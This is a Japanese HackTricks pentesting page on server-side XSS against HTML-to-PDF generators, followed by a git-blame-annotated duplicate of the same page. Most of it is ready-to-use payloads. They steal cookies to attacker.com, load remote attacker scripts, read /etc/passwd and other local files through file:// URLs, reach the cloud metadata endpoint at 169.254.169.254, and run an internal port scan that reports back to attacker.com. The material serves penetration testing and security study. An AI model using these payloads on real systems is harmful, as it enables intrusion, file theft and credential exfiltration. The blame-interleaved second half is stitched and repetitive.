hacktricks/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf.md

# サーバーサイドXSS（ダイナミックPDF）

<details>

<summary><strong>htARTE（HackTricks AWS Red Team Expert）</strong>を使って、ゼロからヒーローまでAWSハッキングを学ぶ</summary>

HackTricksをサポートする他の方法：

- **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください！
- [**公式PEASS＆HackTricksグッズ**](https://peass.creator-spring.com)を入手する
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。

</details>

## サーバーサイドXSS（ダイナミックPDF）

Webページがユーザーが制御する入力を使用してPDFを作成している場合、PDFを作成している**ボットをだます**ことができ、**任意のJSコードを実行**させることができます。\
したがって、**PDF作成ボットが**いくつかの種類の**HTML** **タグを見つけると**、それらを**解釈**し、この動作を悪用して**サーバーXSS**を引き起こすことができます。

`<script></script>` タグが常に機能しないことに注意してください。そのため、JSを実行するためには別の方法が必要です（たとえば、`<img` を悪用する）。\
また、通常の攻撃では、作成されたPDFを**見る/ダウンロードすることができる**ため、JSを介して書いたすべてのものを見ることができます（たとえば、`document.write()`を使用）。ただし、作成されたPDFを**見ることができない**場合は、おそらく**Webリクエストを送信して情報を抽出する必要がある**でしょう（Blind）。

### 人気のあるPDF生成

- **wkhtmltopdf** は、HTMLとCSSをPDFドキュメントに変換する能力で知られており、WebKitレンダリングエンジンを利用しています。このツールはオープンソースのコマンドラインユーティリティとして利用可能であり、幅広いアプリケーションで利用できます。
- **TCPDF** は、PHPエコシステム内でPDF生成のための堅牢なソリューションを提供しています。画像、グラフィック、暗号化を処理でき、複雑なドキュメントを作成するための柔軟性を示しています。
- Node.js環境で作業している場合、**PDFKit** は適切な選択肢です。HTMLとCSSから直接PDFドキュメントを生成でき、Webコンテンツと印刷可能な形式の間の橋渡しを提供します。
- Java開発者は、PDF作成だけでなくデジタル署名やフォーム入力などの高度な機能をサポートするライブラリである**iText** を好むかもしれません。包括的な機能セットにより、安全でインタラクティブなドキュメントを生成するのに適しています。
- **FPDF** は、シンプルさと使いやすさで区別される別のPHPライブラリです。広範な機能を必要とせずにPDF生成に取り組む開発者向けに設計されています。
```markup
<!-- Basic discovery, Write somthing-->
<img src="x" onerror="document.write('test')" />
<script>document.write(JSON.stringify(window.location))</script>
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>

<!--Basic blind discovery, load a resource-->
<img src="http://attacker.com"/>
<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
<link rel=attachment href="http://attacker.com">
```
### SVG

前述のいずれかのペイロードを、このSVGペイロード内で使用できます。Burpcollabサブドメインにアクセスする1つのiframeと、メタデータエンドポイントにアクセスする別のiframeが例として挙げられています。
```markup
<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
<g>
<foreignObject width="800" height="500">
<body xmlns="http://www.w3.org/1999/xhtml">
<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
</body>
</foreignObject>
</g>
</svg>


<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg">
<circle cx="50" cy="50" r="45" fill="green"
id="foo"/>
<script type="text/javascript">
// <![CDATA[
alert(1);
// ]]>
</script>
</svg>
```
あなたは[**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)で多くの**他のSVGペイロード**を見つけることができます。

### パス開示
```markup
<!-- If the bot is accessing a file:// path, you will discover the internal path
if not, you will at least have wich path the bot is accessing -->
<img src="x" onerror="document.write(window.location)" />
<script> document.write(window.location) </script>
```
### 外部スクリプトの読み込み

この脆弱性を悪用する最も確実な方法は、ボットがローカルでコントロールするスクリプトを読み込むように脆弱性を悪用することです。その後、ペイロードをローカルで変更し、ボットが常に同じコードでそれを読み込むようにします。
```markup
<script src="http://attacker.com/myscripts.js"></script>
<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
```
### ローカルファイルの読み取り / SSRF

{% hint style="warning" %}
例として `file:///etc/passwd` を `http://169.254.169.254/latest/user-data` に変更して、外部のウェブページにアクセスしようとしてください（SSRF）。

SSRFが許可されている場合でも、興味深いドメインやIPに到達できない場合は、[潜在的なバイパスをチェックするためにこのページを確認してください](../ssrf-server-side-request-forgery/url-format-bypass.md)。
{% endhint %}
```markup
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
x.open("GET","file:///etc/passwd");x.send();
</script>
```

```markup
<script>
xhzeem = new XMLHttpRequest();
xhzeem.onload = function(){document.write(this.responseText);}
xhzeem.onerror = function(){document.write('failed!')}
xhzeem.open("GET","file:///etc/passwd");
xhzeem.send();
</script>
```

```markup
<iframe src=file:///etc/passwd></iframe>
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
<link rel=attachment href="file:///root/secret.txt">
<object data="file:///etc/passwd">
<portal src="file:///etc/passwd" id=portal>
<embed src="file:///etc/passwd>" width="400" height="400">
<style><iframe src="file:///etc/passwd">
<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
```

```markup
<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
```
### ボットの遅延
```markup
<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
<script>
let time = 500;
setInterval(()=>{
let img = document.createElement("img");
img.src = `https://attacker.com/ping?time=${time}ms`;
time += 500;
}, 500);
</script>
<img src="https://attacker.com/delay">
```
### ポートスキャン
```markup
<!--Scan local port and receive a ping indicating which ones are found-->
<script>
const checkPort = (port) => {
fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
let img = document.createElement("img");
img.src = `http://attacker.com/ping?port=${port}`;
});
}

for(let i=0; i<1000; i++) {
checkPort(i);
}
</script>
<img src="https://attacker.com/startingScan">
```
### [SSRF](../ssrf-server-side-request-forgery/)

この脆弱性は、スクリプトが外部リソースを読み込むことができるため、SSRFに非常に簡単に変換できます。そのため、単にそれを悪用してみてください（メタデータを読む？）。

### 添付ファイル: PD4ML

いくつかのHTML 2 PDFエンジンは、**PD4ML**のように**PDFに添付ファイルを指定**することができます。この機能を悪用して、**PDFに任意のローカルファイルを添付**することができます。\
添付ファイルを開くには、**Firefoxでファイルを開き、ペーパークリップシンボルをダブルクリック**して、添付ファイルを新しいファイルとして**保存**します。\
Burpで**PDFレスポンス**をキャプチャすると、PDF内の添付ファイルが**クリアテキストで表示**されるはずです。

{% code overflow="wrap" %}
```html
<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
<html><pd4ml:attachment src="/etc/passwd" description="attachment sample" icon="Paperclip"/></html>
```
{% endcode %}

## 参考文献

* [https://lbherrera.github.io/lab/h1415-ctf-writeup.html](https://lbherrera.github.io/lab/h1415-ctf-writeup.html)
* [https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)
* [https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html)
* [https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c](https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c)

<details>

<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>

HackTricksをサポートする他の方法:

* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください！
* [**公式PEASS＆HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する。
* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。

</details>
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								# サーバーサイドXSS（ダイナミックPDF）
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								<summary><strong>htARTE（HackTricks AWS Red Team Expert）</strong>を使って、ゼロからヒーローまでAWSハッキングを学ぶ</summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								HackTricksをサポートする他の方法：
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 20:59:40 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								- **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください！
 								- [**公式PEASS＆HackTricksグッズ**](https://peass.creator-spring.com)を入手する
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
 								- **HackTricks**と**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有してください。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								## サーバーサイドXSS（ダイナミックPDF）
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								Webページがユーザーが制御する入力を使用してPDFを作成している場合、PDFを作成している**ボットをだます**ことができ、**任意のJSコードを実行**させることができます。\
 								したがって、**PDF作成ボットが**いくつかの種類の**HTML** **タグを見つけると**、それらを**解釈**し、この動作を悪用して**サーバーXSS**を引き起こすことができます。
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2023-07-30 23:08:56 +00:00
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								`<script></script>` タグが常に機能しないことに注意してください。そのため、JSを実行するためには別の方法が必要です（たとえば、`<img` を悪用する）。\
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								また、通常の攻撃では、作成されたPDFを**見る/ダウンロードすることができる**ため、JSを介して書いたすべてのものを見ることができます（たとえば、`document.write()`を使用）。ただし、作成されたPDFを**見ることができない**場合は、おそらく**Webリクエストを送信して情報を抽出する必要がある**でしょう（Blind）。
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2023-07-30 23:08:56 +00:00
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								### 人気のあるPDF生成
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								- **wkhtmltopdf** は、HTMLとCSSをPDFドキュメントに変換する能力で知られており、WebKitレンダリングエンジンを利用しています。このツールはオープンソースのコマンドラインユーティリティとして利用可能であり、幅広いアプリケーションで利用できます。
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								- **TCPDF** は、PHPエコシステム内でPDF生成のための堅牢なソリューションを提供しています。画像、グラフィック、暗号化を処理でき、複雑なドキュメントを作成するための柔軟性を示しています。
 								- Node.js環境で作業している場合、**PDFKit** は適切な選択肢です。HTMLとCSSから直接PDFドキュメントを生成でき、Webコンテンツと印刷可能な形式の間の橋渡しを提供します。
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								- Java開発者は、PDF作成だけでなくデジタル署名やフォーム入力などの高度な機能をサポートするライブラリである**iText** を好むかもしれません。包括的な機能セットにより、安全でインタラクティブなドキュメントを生成するのに適しています。
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								- **FPDF** は、シンプルさと使いやすさで区別される別のPHPライブラリです。広範な機能を必要とせずにPDF生成に取り組む開発者向けに設計されています。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
-												GitBook: [master] one page modified
											
										
										
											2021-09-08 08:59:37 +00:00
+								<!-- Basic discovery, Write somthing-->
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								<img src="x" onerror="document.write('test')" />
-												GitBook: [master] one page modified
											
										
										
											2021-09-08 08:59:37 +00:00
+								<script>document.write(JSON.stringify(window.location))</script>
 								<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								<!--Basic blind discovery, load a resource-->
 								<img src="http://attacker.com"/>
 								<img src=x onerror="location.href='http://attacker.com/?c='+ document.cookie">
 								<script>new Image().src="http://attacker.com/?c="+encodeURI(document.cookie);</script>
 								<link rel=attachment href="http://attacker.com">
 								```
-												GitBook: [#3525] No subject

											
										
										
											2022-10-02 15:25:27 +00:00
+								### SVG
-												GitBook: [master] one page modified
											
										
										
											2021-06-16 09:00:28 +00:00
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								前述のいずれかのペイロードを、このSVGペイロード内で使用できます。Burpcollabサブドメインにアクセスする1つのiframeと、メタデータエンドポイントにアクセスする別のiframeが例として挙げられています。
-												GitBook: [master] one page modified
											
										
										
											2021-06-16 09:00:28 +00:00
+								```markup
 								<svg xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1" class="root" width="800" height="500">
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								<g>
 								<foreignObject width="800" height="500">
 								<body xmlns="http://www.w3.org/1999/xhtml">
 								<iframe src="http://redacted.burpcollaborator.net" width="800" height="500"></iframe>
 								<iframe src="http://169.254.169.254/latest/meta-data/" width="800" height="500"></iframe>
 								</body>
 								</foreignObject>
 								</g>
-												GitBook: [master] one page modified
											
										
										
											2021-06-16 09:00:28 +00:00
+								</svg>
-												GitBook: [#3154] No subject

											
										
										
											2022-04-30 10:09:20 +00:00
 								<svg width="100%" height="100%" viewBox="0 0 100 100"
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								xmlns="http://www.w3.org/2000/svg">
 								<circle cx="50" cy="50" r="45" fill="green"
 								id="foo"/>
 								<script type="text/javascript">
 								// <![CDATA[
 								alert(1);
 								// ]]>
 								</script>
-												GitBook: [#3154] No subject

											
										
										
											2022-04-30 10:09:20 +00:00
+								</svg>
-												GitBook: [master] one page modified
											
										
										
											2021-06-16 09:00:28 +00:00
+								```
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								あなたは[**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)で多くの**他のSVGペイロード**を見つけることができます。
-												GitBook: [master] one page modified
											
										
										
											2021-06-16 09:00:28 +00:00
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 20:59:40 +00:00
+								### パス開示
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<!-- If the bot is accessing a file:// path, you will discover the internal path
 								if not, you will at least have wich path the bot is accessing -->
 								<img src="x" onerror="document.write(window.location)" />
 								<script> document.write(window.location) </script>
 								```
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								### 外部スクリプトの読み込み
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								この脆弱性を悪用する最も確実な方法は、ボットがローカルでコントロールするスクリプトを読み込むように脆弱性を悪用することです。その後、ペイロードをローカルで変更し、ボットが常に同じコードでそれを読み込むようにします。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<script src="http://attacker.com/myscripts.js"></script>
 								<img src="xasdasdasd" onerror="document.write('<script src="https://attacker.com/test.js"></script>')"/>
 								```
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2023-07-30 23:08:56 +00:00
+								### ローカルファイルの読み取り / SSRF
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2023-07-30 23:08:56 +00:00
+								{% hint style="warning" %}
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								例として `file:///etc/passwd` を `http://169.254.169.254/latest/user-data` に変更して、外部のウェブページにアクセスしようとしてください（SSRF）。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								SSRFが許可されている場合でも、興味深いドメインやIPに到達できない場合は、[潜在的なバイパスをチェックするためにこのページを確認してください](../ssrf-server-side-request-forgery/url-format-bypass.md)。
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2023-07-30 23:08:56 +00:00
+								{% endhint %}
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<script>
 								x=new XMLHttpRequest;
 								x.onload=function(){document.write(btoa(this.responseText))};
 								x.open("GET","file:///etc/passwd");x.send();
-												GitBook: [master] one page modified
											
										
										
											2021-09-08 08:59:37 +00:00
+								</script>
 								```
 								```markup
 								<script>
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								xhzeem = new XMLHttpRequest();
 								xhzeem.onload = function(){document.write(this.responseText);}
 								xhzeem.onerror = function(){document.write('failed!')}
 								xhzeem.open("GET","file:///etc/passwd");
 								xhzeem.send();
-												GitBook: [master] one page modified
											
										
										
											2021-09-08 08:59:37 +00:00
+								</script>
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
 								```markup
 								<iframe src=file:///etc/passwd></iframe>
 								<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
 								<link rel=attachment href="file:///root/secret.txt">
-												GitBook: [master] one page modified
											
										
										
											2020-11-04 10:26:58 +00:00
+								<object data="file:///etc/passwd">
 								<portal src="file:///etc/passwd" id=portal>
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2023-07-30 23:08:56 +00:00
+								<embed src="file:///etc/passwd>" width="400" height="400">
 								<style><iframe src="file:///etc/passwd">
 								<img src='x' onerror='document.write('<iframe src=file:///etc/passwd></iframe>')'/>&text=&width=500&height=500
 								<meta http-equiv="refresh" content="0;url=file:///etc/passwd" />
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Added XSS LFI for dynamic PDF
											
										
										
											2022-07-06 02:55:19 +00:00
+								```markup
 								<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="Attached File: /etc/passwd" pos-x="195" />
 								```
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								### ボットの遅延
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<!--Make the bot send a ping every 500ms to check how long does the bot wait-->
 								<script>
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								let time = 500;
 								setInterval(()=>{
 								let img = document.createElement("img");
 								img.src = `https://attacker.com/ping?time=${time}ms`;
 								time += 500;
 								}, 500);
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								</script>
 								<img src="https://attacker.com/delay">
 								```
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								### ポートスキャン
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```markup
 								<!--Scan local port and receive a ping indicating which ones are found-->
 								<script>
 								const checkPort = (port) => {
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								fetch(`http://localhost:${port}`, { mode: "no-cors" }).then(() => {
 								let img = document.createElement("img");
 								img.src = `http://attacker.com/ping?port=${port}`;
 								});
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								for(let i=0; i<1000; i++) {
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								checkPort(i);
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								}
 								</script>
 								<img src="https://attacker.com/startingScan">
 								```
-												GitBook: [#3525] No subject

											
										
										
											2022-10-02 15:25:27 +00:00
+								### [SSRF](../ssrf-server-side-request-forgery/)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								この脆弱性は、スクリプトが外部リソースを読み込むことができるため、SSRFに非常に簡単に変換できます。そのため、単にそれを悪用してみてください（メタデータを読む？）。
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 20:59:40 +00:00
+								### 添付ファイル: PD4ML
-												GitBook: [#3714] No subject

											
										
										
											2022-12-27 12:57:39 +00:00
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								いくつかのHTML 2 PDFエンジンは、**PD4ML**のように**PDFに添付ファイルを指定**することができます。この機能を悪用して、**PDFに任意のローカルファイルを添付**することができます。\
 								添付ファイルを開くには、**Firefoxでファイルを開き、ペーパークリップシンボルをダブルクリック**して、添付ファイルを新しいファイルとして**保存**します。\
 								Burpで**PDFレスポンス**をキャプチャすると、PDF内の添付ファイルが**クリアテキストで表示**されるはずです。
-												GitBook: [#3714] No subject

											
										
										
											2022-12-27 12:57:39 +00:00
 								{% code overflow="wrap" %}
 								```html
 								<!-- From https://0xdf.gitlab.io/2021/04/24/htb-bucket.html -->
 								<html><pd4ml:attachment src="/etc/passwd" description="attachment sample" icon="Paperclip"/></html>
 								```
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								{% endcode %}
-												Translated to Japanese

											
										
										
											2023-07-07 23:42:27 +00:00
+								## 参考文献
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated ['README.md', 'generic-methodologies-and-resources/pentesting

											
										
										
											2023-07-30 23:08:56 +00:00
+								* [https://lbherrera.github.io/lab/h1415-ctf-writeup.html](https://lbherrera.github.io/lab/h1415-ctf-writeup.html)
 								* [https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/](https://buer.haus/2017/06/29/escalating-xss-in-phantomjs-image-rendering-to-ssrflocal-file-read/)
 								* [https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html](https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html)
 								* [https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c](https://infosecwriteups.com/breaking-down-ssrf-on-pdf-generation-a-pentesting-guide-66f8a309bf3c)
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE（HackTricks AWS Red Team Expert）</strong></a><strong>！</strong></summary>
-												Translated ['pentesting-web/dangling-markup-html-scriptless-injection/ss

											
										
										
											2024-01-01 20:59:40 +00:00
 								HackTricksをサポートする他の方法:
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								* **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください！
 								* [**公式PEASS＆HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
 								* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
-												Translated ['forensics/basic-forensic-methodology/memory-dump-analysis/R

											
										
										
											2024-02-09 02:33:52 +00:00
+								* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)を**フォロー**する。
-												Translated ['forensics/basic-forensic-methodology/pcap-inspection/usb-ke

											
										
										
											2024-02-06 03:40:01 +00:00
+								* **HackTricks**および**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>